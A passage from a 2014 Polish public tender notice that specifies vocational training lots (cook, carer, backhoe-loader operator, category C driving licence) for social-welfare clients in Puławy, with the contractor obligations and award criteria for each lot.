Liczba godzin: 100 godzin, w tym 20 godzin dydaktycznych ( po 45 minut) teorii i 80 godzin zegarowych praktyki.  
Czas trwania szkolenia: Szkolenie może odbyć się w dni robocze, tj. od poniedziałku do piątku,  w godzinach między 8:00 a 15:00.  
    Miejsce szkolenia: Puławy.
    Termin szkolenia:  01.IX -15.XII.2014r.
    Uczestnicy szkolenia: klienci MOPS-u w Puławach, beneficjenci ostateczni projektu  Aktywni-niezależni
Cel szkolenia: Celem kursu jest teoretyczne i praktyczne nabycie  wiedzy i umiejętności uczestników szkolenia w   podstawowym zakresie fryzjerstwa. 
Wymagane kwalifikacje trenera / wykładowcy: osoba/y prowadząca/e zajęcia teoretyczne i praktyczne  o  odpowiednich kwalifikacjach i uprawnieniach zgodnych z tematyką szkolenia;
Sposób sprawdzania efektów szkolenia: Szkolenie winno zakończyć się egzaminem wewnętrznym oceniającym nabyte umiejętności. Wyniki egzaminu zostaną przedstawione Zamawiającemu wraz z pozostałą dokumentacją.
W ramach usługi szkoleniowej wykonawca zobowiązany jest do:
 ubezpieczenia od następstw nieszczęśliwych wypadków na czas trwania zajęć praktycznych i teoretycznych - kopie polisy ubezpieczeniowej należy przekazać Zamawiającemu wraz z protokołem odbioru usługi.
 wykonania i opłacenia uczestnikom niezbędnych badań lekarskich orzekających brak przeciwskazań do pracy na danym stanowisku (badania do celów sanitarno-epidemiologicznych). Badanie obejmuje badanie lekarskie i badanie laboratoryjne. Kopie dokumentacji potwierdzającej wykonanie badań lekarskich należy przekazać Zamawiającemu wraz z protokołem odbioru usługi. 
 niezwłocznego poinformowania Zamawiającego o przeciwwskazaniach zdrowotnych uniemożliwiających beneficjentowi ostatecznemu udział w szkoleniu. W takim przypadku Zamawiający pokrywa jedynie koszty przeprowadzonych badań lekarskich;
 zapewnienia bazy lokalowej do przeprowadzenia części teoretycznej  i praktycznej wyposażonej w odpowiednią liczbę stolików  i krzeseł, a także sprzęt i pomoce dydaktyczne umożliwiające prawidłową realizację szkolenia i spełniające wymogi w zakresie BHP i p.poż. Pomieszczenie, w którym będą odbywały się zajęcia, musi być oznaczone poprzez wywieszenie: nazwy szkolenia, lub plakatu oraz informacji o współfinansowaniu ze środków Europejskiego Funduszu Społecznego zgodnie z wytycznymi dotyczącymi oznaczenia projektów w ramach POKL;
 zapewnienia odpowiednich warunków, sprzętu oraz pakietu materiałów i narzędzi (w odpowiednim asortymencie i ilości) do przeprowadzenia części praktycznej szkolenia.
 zapewnienia wykładowców zajęć teoretycznych i praktycznych  o odpowiednich kwalifikacjach i uprawnieniach zgodnych z tematyką szkolenia;
 zapewnienia materiałów szkoleniowych tj. jedną pozycję książkową odpowiadającą tematyce zajęć oraz skrypt, notatnik, długopis z naniesionymi odpowiednio obowiązującymi logotypami dla każdego uczestnika i jednym egzemplarzem dla Zamawiającego: 
 wydania uczestnikom szkolenia, po pozytywnym ukończeniu kursu, zaświadczenia o ukończeniu szkolenia oznaczonego logotypem Programu Operacyjnego Kapitał Ludzki i Unii Europejskiej oraz sformułowaniem Projekt Aktywni - niezależni współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Projekt zaświadczenia zostanie zatwierdzony przez Zamawiającego.
 zapewnienia na zajęciach teoretycznych codziennego serwisu kawowego dla każdego uczestnika (kawa, herbata, cukier, śmietanka, zimne napoje w butelkach 0,5l, ciastka po 10dkg na osobę, min. 2 rodzaje); 
 zapewnienia jednego gorącego posiłku każdego dnia szkolenia dla każdego uczestnika (co najmniej drugie danie);
 przeprowadzenia oceny merytorycznej i technicznej przebiegu szkolenia. na podstawie  ankiety oceniającej. Ankieta wraz z zestawieniem wyników zostanie złożona Zamawiającemu wraz z protokołem odbioru usługi;
 przygotowania i przekazania Zamawiającemu pełnej dokumentacji szkoleniowej, zgodnej z ustaleniami zawartymi w umowie z Zamawiającym( m.in., listy obecności, listy odbioru materiałów szkoleniowych, lista korzystania z cateringu, potwierdzoną za zgodność z oryginałem kopię zaświadczenia każdego uczestnika potwierdzenie otrzymania zaświadczenia, dziennik zajęć, ankiety ewaluacyjne i ich zestawienie wyników, kopia polisy NNW itp.),
 prowadzenia dokumentacji zdjęciowej i przekazania jej zamawiającemu na   dowolnym nośniku danych. (np CD, DVD ,pamięć USB karta pamięci);
 niezwłocznego  informowania koordynatora projektu o nie zgłoszeniu się beneficjenta ostatecznego na zajęcia, przerwaniu zajęć lub rezygnacji z uczestnictwa oraz innych sytuacjach, które mają wpływ na realizację programu zajęć;
Zamawiający dopuszcza możliwość dołączenia osób do innej grupy szkoleniowej na terenie Puław o tej samej tematyce w tym przypadku zajęcia mogą odbywać się, zgodnie z harmonogramem grupy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kucharz małej gastronomii z minimum sanitarnym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników szkolenia: 2osoby ( +/- 1 osoba)
Liczba grup: 1 grupa.
Liczba godzin: 120 godzin w tym 56 godzin dydaktycznych(po 45 min) teorii i 64 godziny praktyki.
Czas trwania szkolenia: Szkolenie może odbyć się w dni robocze, tj. od poniedziałku do piątku,  w godzinach między 8:00 a 15:00. 
    Miejsce szkolenia: Puławy.
    Termin szkolenia:  01.IX -15.XII.2014r.
    Uczestnicy szkolenia: klienci MOPS-u w Puławach, beneficjenci ostateczni projektu  Aktywni-niezależni
Cel szkolenia: Celem kursu jest teoretyczne i praktyczne nabycie  wiedzy i umiejętności uczestników kucharz małej gastronomii z minimum sanitarnym
     Zakres tematyczny: Proponowane minimum programowe:
 dobieranie surowców i półproduktów do produkcji w małej gastronomii,
 dobieranie, obsługiwanie maszyn, urządzeń i sprzętu w małej gastronomii,
 przeprowadzanie obróbki wstępnej surowców i półproduktów w małej gastronomii,
 przygotowywanie półproduktów do dalszej obróbki w małej gastronomii,
 dokonywanie obróbki termicznej surowców i półproduktów w małej gastronomii,
 sporządzanie różnymi technikami i metodami podstawowego asortymentu potraw i napojów w małej gastronomii,
 planowanie posiłków i układanie prostego menu w małej gastronomii,
 porcjowanie, dekorowanie i ekspedycja potraw w małej gastronomii,
 organizowanie i porządkowanie własnego stanowiska pracy w małej gastronomii zgodnie z zasadami ergonomii, bezpieczeństwa i higieny pracy, ochrony,
 przechowywanie i magazynowanie surowców, półproduktów i wyrobów gotowych w małej gastronomii,
 ocenianie jakościowe i ilościowe surowców i półproduktów w małej gastronomii,
 ocenianie jakościowe i ilościowe wyrobów gotowych małej gastronomii.
Wymagane kwalifikacje trenera / wykładowcy: osoba/y prowadząca/e zajęcia teoretyczne i praktyczne  o  odpowiednich kwalifikacjach i uprawnieniach zgodnych z tematyką szkolenia;
Sposób sprawdzania efektów szkolenia: Szkolenie winno zakończyć się egzaminem wewnętrznym oceniającym nabyte umiejętności. Wyniki egzaminu zostaną przedstawione Zamawiającemu wraz z pozostałą dokumentacją.
W ramach usługi szkoleniowej wykonawca zobowiązany jest do:
 Ubezpieczenia od następstw nieszczęśliwych wypadków na czas trwania zajęć praktycznych i teoretycznych - kopie polisy ubezpieczeniowej należy przekazać Zamawiającemu wraz z protokołem odbioru usługi.
 Wykonania i opłacenia uczestnikom niezbędnych badań lekarskich orzekających brak przeciwskazań do pracy na danym stanowisku (badania do celów sanitarno-epidemiologicznych). Badanie obejmuje badanie lekarskie i badanie laboratoryjne. Kopie dokumentacji potwierdzającej wykonanie badań lekarskich należy przekazać Zamawiającemu wraz z protokołem odbioru usługi. 
 niezwłocznego poinformowania Zamawiającego o przeciwwskazaniach zdrowotnych uniemożliwiających beneficjentowi ostatecznemu udział w szkoleniu. W takim przypadku Zamawiający pokrywa jedynie koszty przeprowadzonych badań lekarskich;
 zapewnienia bazy lokalowej do przeprowadzenia części teoretycznej  i praktycznej wyposażonej w odpowiednią liczbę stolików  i krzeseł, a także sprzęt i pomoce dydaktyczne umożliwiające prawidłową realizację szkolenia i spełniające wymogi w zakresie BHP i p.poż. Pomieszczenie, w którym będą odbywały się zajęcia, musi być oznaczone poprzez wywieszenie: nazwy szkolenia, lub plakatu oraz informacji o współfinansowaniu ze środków Europejskiego Funduszu Społecznego zgodnie z wytycznymi dotyczącymi oznaczenia projektów w ramach POKL;
 zapewnienia odpowiednich warunków, sprzętu oraz pakietu materiałów i narzędzi (w odpowiednim asortymencie i ilości) do przeprowadzenia części praktycznej szkolenia.
 zapewnienia wykładowców zajęć teoretycznych i praktycznych  o odpowiednich kwalifikacjach i uprawnieniach zgodnych z tematyką szkolenia;
 zapewnienia materiałów szkoleniowych tj. jedną pozycję książkową odpowiadającą tematyce zajęć oraz skrypt, notatnik, długopis z naniesionymi odpowiednio obowiązującymi logotypami dla każdego uczestnika i jednym egzemplarzem dla Zamawiającego: 
 wydania uczestnikom szkolenia, po pozytywnym ukończeniu kursu, zaświadczenia o ukończeniu szkolenia oznaczonego logotypem Programu Operacyjnego Kapitał Ludzki i Unii Europejskiej oraz sformułowaniem Projekt Aktywni - niezależni współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Projekt zaświadczenia zostanie zatwierdzony przez Zamawiającego.
 zapewnienia na zajęciach teoretycznych codziennego serwisu kawowego dla każdego uczestnika (kawa, herbata, cukier, śmietanka, zimne napoje w butelkach 0,5l, ciastka po 10dkg na osobę, min. 2 rodzaje); 
 zapewnienia jednego gorącego posiłku każdego dnia szkolenia dla każdego uczestnika (co najmniej drugie danie);
 przeprowadzenia oceny merytorycznej i technicznej przebiegu szkolenia. na podstawie  ankiety oceniającej. Ankieta wraz z zestawieniem wyników zostanie złożona Zamawiającemu wraz z protokołem odbioru usługi;
 przygotowania i przekazania Zamawiającemu pełnej dokumentacji szkoleniowej, zgodnej z ustaleniami zawartymi w umowie z Zamawiającym( m.in., listy obecności, listy odbioru materiałów szkoleniowych, lista korzystania z cateringu, potwierdzoną za zgodność z oryginałem kopię zaświadczenia każdego uczestnika potwierdzenie otrzymania zaświadczenia, dziennik zajęć, ankiety ewaluacyjne i ich zestawienie wyników, kopia polisy NNW itp.),
 prowadzenia dokumentacji zdjęciowej i przekazania jej zamawiającemu na   dowolnym nośniku danych. (np CD, DVD ,pamięć USB karta pamięci);
 niezwłocznego  informowania koordynatora projektu o nie zgłoszeniu się beneficjenta ostatecznego na zajęcia, przerwaniu zajęć lub rezygnacji z uczestnictwa oraz innych sytuacjach, które mają wpływ na realizację programu zajęć;
Zamawiający dopuszcza możliwość dołączenia osób do innej grupy szkoleniowej na terenie Puław o tej samej tematyce w tym przypadku zajęcia mogą odbywać się, zgodnie z harmonogramem grupy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.09-.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Opiekun osób starszych, niepełnosprawnych i zależnych, w tym dzieci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników szkolenia: 3 osób ( +/- 1 osoba)
Liczba grup: 1 grupa.
Liczba godzin: 100 godzin w tym 56 godz. dydaktycznych (po 45 minut) teorii  - 7 dni roboczych po 8 godz. dydaktycznych i 44 godz. zegarowych  praktyki w ciągu 6 dni roboczych.
Czas trwania szkolenia: Szkolenie teoretyczne może odbyć się w dni robocze, tj. od poniedziałku do piątku,  w godzinach między 8:00 a 15:00. 
 Miejsce szkolenia: Puławy 
 Zajęcia teoretyczne - na terenie Puław - sala szkoleniowa, przestronna, odpowiednio oświetlona, klimatyzowana lub minimum wentylowana, dostosowana do prowadzenia zajęć.
 Zajęcia praktyczne -44 godziny zajęć w co najmniej 3 rodzajach placówek  opiekuńczych, w tym  po 15 godzin w placówce wsparcia dziennego dla dzieci (przedszkole, żłobek, dom dziecka etc) -
  14 godzin w placówce opieki paliatywnej (hospicjum, szpital -oddział geriatrii), 15 godzin w placówce wsparcia osób niepełnosprawnych (ŚDS, ZAZ, WTZ ) i innych
    Termin szkolenia:  01.IX -15.XII.2014r.
    Uczestnicy szkolenia: klienci MOPS-u w Puławach, beneficjenci ostateczni projektu Aktywni-niezależni
Cel szkolenia: Celem szkolenia jest przygotowanie uczestników do podjęcia pracy w charakterze opiekunki osób starszych, niepełnosprawnych i dzieci zarówno w instytucjach jak i w domach u rodzin prywatnych. Uczestnicy nabędą wiedzę teoretyczna i praktyczną z zakresu opieki i pielęgnacji osób zależnych.
Zakres tematyczny: Moduł Pielęgnacyjny - anatomia i fizjologia człowieka, potrzeby biologiczne, podstawy żywieniowe, podstawy dietetyki, żywienie i pielęgnacja dzieci, osób starszych i niepełnosprawnych, opieka nad chorym dzieckiem, osoba starszą i niepełnosprawną, pierwsza pomoc przedmedyczna w nagłych wypadkach, zagadnienia z rehabilitacji osób niepełnosprawnych, wykonywanie czynności higienicznych przy podopiecznym
  Moduł pedagogiczno -psychologiczny- podstawowe zagadnienia dotyczące rozwoju i wychowania dziecka, podstawy psychologii komunikacji z podopiecznym i jego rodziną, psychologiczne i pedagogiczne uwarunkowania pracy z osobami starszymi, chorymi i niepełnosprawnymi, rozpoznawanie i zaspokajanie potrzeb osób zależnych
  Moduł animacyjny- organizowanie czasu dziecku, osobie starszej i niepełnosprawnej, podstawowe zagadnienia edukacji dzieci, osób starszych i niepełnosprawnych, gry i zabawy wpływające na rozwój dziecka
  Praktyka zawodowa -praktyczne ćwiczenia umiejętności
Wymagane kwalifikacje trenera / wykładowcy: osoba/y prowadząca/e zajęcia teoretyczne i praktyczne  o  odpowiednich kwalifikacjach i uprawnieniach zgodnych z tematyką szkolenia;
Sposób sprawdzania efektów szkolenia: Szkolenie winno zakończyć się egzaminem wewnętrznym oceniającym nabyte umiejętności. Wyniki egzaminu zostaną przedstawione Zamawiającemu wraz z pozostałą dokumentacją.
W ramach usługi szkoleniowej wykonawca zobowiązany jest do:
 ubezpieczenia od następstw nieszczęśliwych wypadków na czas trwania zajęć praktycznych i teoretycznych - kopie polisy ubezpieczeniowej należy przekazać Zamawiającemu wraz z protokołem odbioru usługi.
 zapewnienia bazy lokalowej do przeprowadzenia części teoretycznej  i praktycznej wyposażonej w odpowiednią liczbę stolików  i krzeseł, a także sprzęt i pomoce dydaktyczne umożliwiające prawidłową realizację szkolenia i spełniające wymogi w zakresie BHP i p.poż. Pomieszczenie, w którym będą odbywały się zajęcia, musi być oznaczone poprzez wywieszenie: nazwy szkolenia, lub plakatu oraz informacji o współfinansowaniu ze środków Europejskiego Funduszu Społecznego zgodnie z wytycznymi dotyczącymi oznaczenia projektów w ramach POKL;
 Wykonania i opłacenia uczestnikom niezbędnych badań lekarskich orzekających brak przeciwskazań do pracy na danym stanowisku (badania do celów sanitarno-epidemiologicznych). Badanie obejmuje badanie lekarskie i badanie laboratoryjne. Kopie dokumentacji potwierdzającej wykonanie badań lekarskich należy przekazać Zamawiającemu wraz z protokołem odbioru usługi. 
 niezwłocznego poinformowania Zamawiającego o przeciwwskazaniach zdrowotnych uniemożliwiających beneficjentowi ostatecznemu udział w szkoleniu. W takim przypadku Zamawiający pokrywa jedynie koszty przeprowadzonych badań lekarskich;
 zapewnienia odpowiednich warunków, sprzętu oraz pakietu materiałów i narzędzi (w odpowiednim asortymencie i ilości) do przeprowadzenia części praktycznej szkolenia.
 zapewnienia wykładowców zajęć teoretycznych i praktycznych  o odpowiednich kwalifikacjach i uprawnieniach zgodnych z tematyką szkolenia;
 zapewnienia materiałów szkoleniowych tj. jedną pozycję książkową odpowiadającą tematyce zajęć oraz skrypt, notatnik, długopis z naniesionymi odpowiednio obowiązującymi logotypami dla każdego uczestnika i jednym egzemplarzem dla Zamawiającego: 
 wydania uczestnikom szkolenia, po pozytywnym ukończeniu kursu, zaświadczenia o ukończeniu szkolenia oznaczonego logotypem Programu Operacyjnego Kapitał Ludzki i Unii Europejskiej oraz sformułowaniem Projekt Aktywni-niezależni współfinansowany z Europejskiego Funduszu Społecznego. Projekt zaświadczenia zostanie zatwierdzony przez Zamawiającego.
 zapewnienia na zajęciach teoretycznych codziennego serwisu kawowego dla każdego uczestnika (kawa, herbata, cukier, śmietanka, zimne napoje w butelkach 0,5l, ciastka po 10dkg na osobę, min. 2 rodzaje); 
 zapewnienia jednego gorącego posiłku każdego dnia szkolenia dla każdego uczestnika (co najmniej drugie danie);
 przeprowadzenia oceny merytorycznej i technicznej przebiegu szkolenia. na podstawie  ankiety oceniającej. Ankieta wraz z zestawieniem wyników zostanie złożona Zamawiającemu wraz z protokołem odbioru usługi;
 przygotowania i przekazania Zamawiającemu pełnej dokumentacji szkoleniowej, zgodnej z ustaleniami zawartymi w umowie z Zamawiającym( m.in., listy obecności, listy odbioru materiałów szkoleniowych, lista korzystania z cateringu, potwierdzoną za zgodność z oryginałem kopię zaświadczenia każdego uczestnika potwierdzenie otrzymania zaświadczenia, dziennik zajęć, ankiety ewaluacyjne i ich zestawienie wyników, kopia polisy NNW itp.),
 prowadzenia dokumentacji zdjęciowej i przekazania jej zamawiającemu na   dowolnym nośniku danych. (np CD, DVD ,pamięć USB karta pamięci);
 niezwłocznego  informowania koordynatora projektu o nie zgłoszeniu się beneficjenta ostatecznego na zajęcia, przerwaniu zajęć lub rezygnacji z uczestnictwa oraz innych sytuacjach, które mają wpływ na realizację programu zajęć;
Zamawiający dopuszcza możliwość dołączenia osób do innej grupy szkoleniowej na terenie Puław o tej samej tematyce w tym przypadku zajęcia mogą odbywać się, zgodnie z harmonogramem grupy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Operator koparko ładowarki klasa III ( wszystkie typy) zakończony egzaminem państwowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników szkolenia: 1osoba ( szkolenie może się nie odbyć w przypadku rezygnacji z projektu beneficjenta ostatecznego)
Liczba godzin: 201godzin  w tym 116 godzin teorii i 85 godzin praktyk z czego 25 godzin wstępnego instruktażu dla osoby nie posiadającej stażu w obsłudze koparko-ładowarki.
Czas trwania szkolenia: Szkolenie może odbyć się we wszystkie dni w tygodniu po  uprzednim ustaleniu z beneficjentem  ostatecznym. Wykonawca do 15 grudnia 2014r. ma zakończyć zajęcia praktyczne i teoretyczne, przeprowadzić egzamin wewnętrzny oraz ustalić termin i opłacić egzamin państwowy.
    Miejsce szkolenia: Puławy lub miejscowość położona nie dalej niż 70 km od Puław.
    Termin szkolenia:  01.IX -15.XII.2014r.
    Uczestnicy szkolenia: klient MOPS-u w Puławach, beneficjent ostateczny projektu  Aktywni-niezależni
Cel szkolenia: Celem szkolenia jest przygotowanie teoretyczne i praktyczne oraz uzyskanie wiedzy, umiejętności i uprawnień w zawodzie operator koparko -ładowarki oraz uzyskanie pozytywnego wyniku egzaminu państwowego (praktycznego i teoretycznego) przed Komisją Instytutu mechanizacji Budownictwa i Górnictwa Skalnego
Zakres tematyczny: Dokumentacja techniczna, BHP oraz wiadomości z zakresu elektrotechniki, hydrauliki, silników spalinowych i budowy koparko ładowarki oraz nabycie umiejętności   obsługi i pracy na koparko - ładowarce
Wymagane kwalifikacje trenera / wykładowcy: osoba/y prowadząca/e zajęcia teoretyczne i praktyczne  o  odpowiednich kwalifikacjach i uprawnieniach zgodnych z tematyką szkolenia;
Sposób sprawdzania efektów szkolenia: Szkolenie winno zakończyć się egzaminem wewnętrznym oceniającym nabyte umiejętności oraz zorganizowaniem i opłaceniem egzaminu przed Komisją Instytutu Mechanizacji, Budownictwa i Górnictwa Skalnego
. Wyniki egzaminu zostaną przedstawione Zamawiającemu wraz z pozostałą dokumentacją.
W ramach usługi szkoleniowej wykonawca zobowiązany jest do:
ubezpieczenia od następstw nieszczęśliwych wypadków na czas trwania zajęć praktycznych i teoretycznych - kopie polisy ubezpieczeniowej należy przekazać Zamawiającemu wraz z protokołem odbioru usługi.
wykonania i opłacenia uczestnikowi niezbędnych badań lekarskich orzekających brak ewentualnych przeciwwskazań zdrowotnych do pracy na danym stanowisku kopie dokumentacji potwierdzającej wykonanie badań lekarskich należy przekazać Zamawiającemu wraz z protokołem odbioru usługi;
zorganizowania i opłacenia egzaminu przed Komisją Instytutu Mechanizacji, Budownictwa i Górnictwa Skalnego
niezwłocznego poinformowania Zamawiającego o przeciwwskazaniach zdrowotnych uniemożliwiających beneficjentowi ostatecznemu udział w szkoleniu. W takim przypadku Zamawiający pokrywa jedynie koszty przeprowadzonych badań lekarskich;
zapewnienia bazy lokalowej do przeprowadzenia części teoretycznej  i praktycznej wyposażonej w odpowiednią liczbę stolików  i krzeseł, a także sprzęt i pomoce dydaktyczne umożliwiające prawidłową realizację szkolenia i spełniające wymogi w zakresie BHP i p.poż. Pomieszczenie, w którym będą odbywały się zajęcia, musi być oznaczone poprzez wywieszenie: nazwy szkolenia, lub plakatu oraz informacji o współfinansowaniu ze środków Europejskiego Funduszu Społecznego zgodnie z wytycznymi dotyczącymi oznaczenia projektów w ramach POKL;
zapewnienia odpowiednich warunków, sprzętu oraz pakietu materiałów i narzędzi (w odpowiednim asortymencie i ilości) do przeprowadzenia części praktycznej szkolenia.
zapewnienia wykładowców zajęć teoretycznych i praktycznych  o odpowiednich kwalifikacjach i uprawnieniach zgodnych z tematyką szkolenia;
zapewnienia materiałów szkoleniowych tj. jedną pozycję książkową odpowiadającą tematyce zajęć oraz skrypt, notatnik, długopis z naniesionymi odpowiednio obowiązującymi logotypami dla uczestnika i jeden egzemplarz dla Zamawiającego: 
 wydania uczestnikowi szkolenia, po pozytywnym ukończeniu kursu, zaświadczenia o ukończeniu szkolenia oznaczonego logotypem Programu Operacyjnego Kapitał Ludzki i Unii Europejskiej oraz sformułowaniem Projekt Aktywni - niezależni współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Projekt zaświadczenia zostanie zatwierdzony przez Zamawiającego.
zapewnienia na zajęciach teoretycznych codziennego serwisu kawowego dla uczestnika (kawa, herbata, cukier, śmietanka, zimne napoje w butelkach 0,5l, ciastka po 10dkg na osobę, min. 2 rodzaje); 
 zapewnienia jednego gorącego posiłku każdego dnia szkolenia dla uczestnika (co najmniej drugie danie);
 przeprowadzenia oceny merytorycznej i technicznej przebiegu szkolenia. na podstawie  ankiety oceniającej. Ankieta wraz z zestawieniem wyników zostanie złożona Zamawiającemu wraz z protokołem odbioru usługi;
 przygotowania i przekazania Zamawiającemu pełnej dokumentacji szkoleniowej, zgodnej z ustaleniami zawartymi w umowie z Zamawiającym (m.in., listy obecności, listy odbioru materiałów szkoleniowych, lista korzystania z cateringu, potwierdzoną za zgodność z oryginałem kopię zaświadczenia każdego uczestnika potwierdzenie otrzymania zaświadczenia, dziennik zajęć, ankiety ewaluacyjne i ich zestawienie wyników, kopia polisy NNW itp.),
 prowadzenia dokumentacji zdjęciowej i przekazania jej zamawiającemu na  dowolnym nośniku danych. (np CD, DVD ,pamięć USB karta pamięci);
 niezwłocznego  informowania koordynatora projektu o nie zgłoszeniu się beneficjenta ostatecznego na zajęcia, przerwaniu zajęć lub rezygnacji z uczestnictwa oraz innych sytuacjach, które mają wpływ na realizację programu zajęć;
 w przypadku odbywania zajęć poza Puławami Wykonawca zobowiązany jest zwrócić uczestnikowi szkolenia kosztów przejazdu do miejsca szkolenia i z powrotem ( koszt przejazdu należy uwzględnić w kalkulacji kosztów szkolenia).
Zamawiający dopuszcza możliwość dołączenia osoby do innej grupy szkoleniowej o tej samej tematyce w tym przypadku zajęcia mogą odbywać się, zgodnie z harmonogramem grupy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Prawo jazdy kategorii C.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników szkolenia: 1osoba ( szkolenie może się nie odbyć w przypadku rezygnacji z projektu beneficjenta ostatecznego)
Liczba godzin: 60 godzin w tym teoria 20 godzin teoretycznych i praktyka 40 godzin zegarowych.
Czas trwania szkolenia: Szkolenie może odbyć się we wszystkie dni w tygodniu po  uprzednim ustaleniu z beneficjentem  ostatecznym. Wykonawca do 20 grudnia 2014r. ma zakończyć zajęcia praktyczne i teoretyczne, przeprowadzić egzamin wewnętrzny oraz ustalić termin i opłacić egzamin państwowy.    
    Miejsce szkolenia: Zajęcia teoretyczne - na terenie Puław.  Zajęcia praktyczne powinny odbywać się na placu   manewrowym oraz w mieście, w którym beneficjent ostateczny będzie zdawał egzamin państwowy.
    Termin szkolenia:  01.IX -20.XII.2014r.
    Uczestnicy szkolenia: klient MOPS-u w Puławach, beneficjent ostateczny projektu  Aktywni-niezależni
Cel szkolenia: Celem kursu jest teoretyczne i praktyczne nabycie wiedzy i umiejętności uczestników kursu oraz uzyskanie pozytywnego wyniku egzaminu państwowego w zakresie prawa jazdy kategorii C.
Zakres tematyczny: Zgodnie z  aktualnym Rozporządzeniem  Ministra Transportu, Budownictwa i Gospodarki Morskiej w sprawie egzaminowania osób ubiegających się o uprawnienia do kierowania pojazdami, szkolenia, egzaminowania i uzyskiwania uprawnień przez egzaminatorów oraz wzorów dokumentów stosowanych w tych sprawach.
Wymagane kwalifikacje trenera / wykładowcy: osoba/y prowadząca/e zajęcia teoretyczne i praktyczne  o  odpowiednich kwalifikacjach i uprawnieniach zgodnych z tematyką szkolenia;
Sposób sprawdzania efektów szkolenia: Szkolenie winno zakończyć się egzaminem wewnętrznym oceniającym nabyte umiejętności oraz zgłoszeniem  uczestnika  kursu na egzamin państwowy i opłacenia egzaminu państwowego w zakresie prawa jazdy kat. C, w uprawnionym ośrodku egzaminacyjnym do 20 grudnia 2014r. 
Wyniki egzaminu wewnętrznego oraz kopia zgłoszenia opłaty za egzamin zewnętrzny zostaną przedstawione Zamawiającemu wraz z pozostałą dokumentacją.
W ramach usługi szkoleniowej wykonawca zobowiązany jest do:
ubezpieczenia od następstw nieszczęśliwych wypadków na czas trwania zajęć praktycznych i teoretycznych - kopie polisy ubezpieczeniowej należy przekazać Zamawiającemu wraz z protokołem odbioru usługi.
 wykonanie i opłacenie uczestnikowi niezbędnych badań lekarskich orzekających brak ewentualnych przeciwwskazań zdrowotnych do kierowania pojazdem -kopie dokumentacji potwierdzającej wykonanie badań lekarskich należy przekazać Zamawiającemu wraz z protokołem odbioru usługi;
 niezwłocznego poinformowania Zamawiającego o przeciwwskazaniach zdrowotnych uniemożliwiających beneficjentowi ostatecznemu udział w kursie. W takim przypadku Zamawiający pokrywa jedynie koszty przeprowadzonych badań lekarskich;
 zapewnienia bazy lokalowej do przeprowadzenia części teoretycznej  i praktycznej wyposażonej w odpowiednią liczbę stolików  i krzeseł, a także sprzęt i pomoce dydaktyczne umożliwiające prawidłową realizację szkolenia i spełniające wymogi w zakresie BHP i p.poż. Pomieszczenie, w którym będą odbywały się zajęcia, musi być oznaczone poprzez wywieszenie: nazwy szkolenia, lub plakatu oraz informacji o współfinansowaniu ze środków Europejskiego Funduszu Społecznego zgodnie z wytycznymi dotyczącymi oznaczenia projektów w ramach POKL;
 zapewnienia odpowiednich warunków do przeprowadzenia części praktycznej szkolenia tj. plac manewrowy, odpowiednie pojazdy samochodowe.
 zapewnienia wykładowców zajęć teoretycznych i praktycznych  o odpowiednich kwalifikacjach i uprawnieniach zgodnych z tematyką szkolenia;
 zapewnienia materiałów szkoleniowych bez dodatkowych opłat ( minimum podręcznik dla kierowcy kat. C i testy egzaminacyjne) z naniesionymi odpowiednio obowiązującymi logotypami dla uczestnika i jeden egzemplarz dla Zamawiającego: 
 zgłoszenia uczestnika kursu na egzamin państwowy i opłacenia egzaminu państwowego w zakresie prawa jazdy kat. C, w uprawnionym ośrodku egzaminacyjnym.
 wydania uczestnikowi szkolenia, po pozytywnym ukończeniu kursu, zaświadczenia o ukończeniu szkolenia zgodnie z aktualnym Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. nr 217, poz. 1834 z późn. zm.) oznaczonego logotypem Programu Operacyjnego Kapitał Ludzki i Unii Europejskiej;
 prowadzenia  i przekazania dokumentacji przebiegu szkolenia m.in. kartę kursanta, listy obecności i innych wcześniej wymienionych dokumentów - przedstawionych zamawiającemu przy przekazaniu protokołu odbioru szkolenia
 prowadzenie dokumentacji zdjęciowej i przekazanie jej zamawiającemu na   dowolnym nośniku danych. (np CD, DVD ,pamięć USB karta pamięci);
 niezwłocznego  informowania koordynatora projektu o nie zgłoszeniu się beneficjenta ostatecznego na zajęcia, przerwaniu zajęć lub rezygnacji z uczestnictwa oraz innych sytuacjach, które mają wpływ na realizację programu zajęć;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
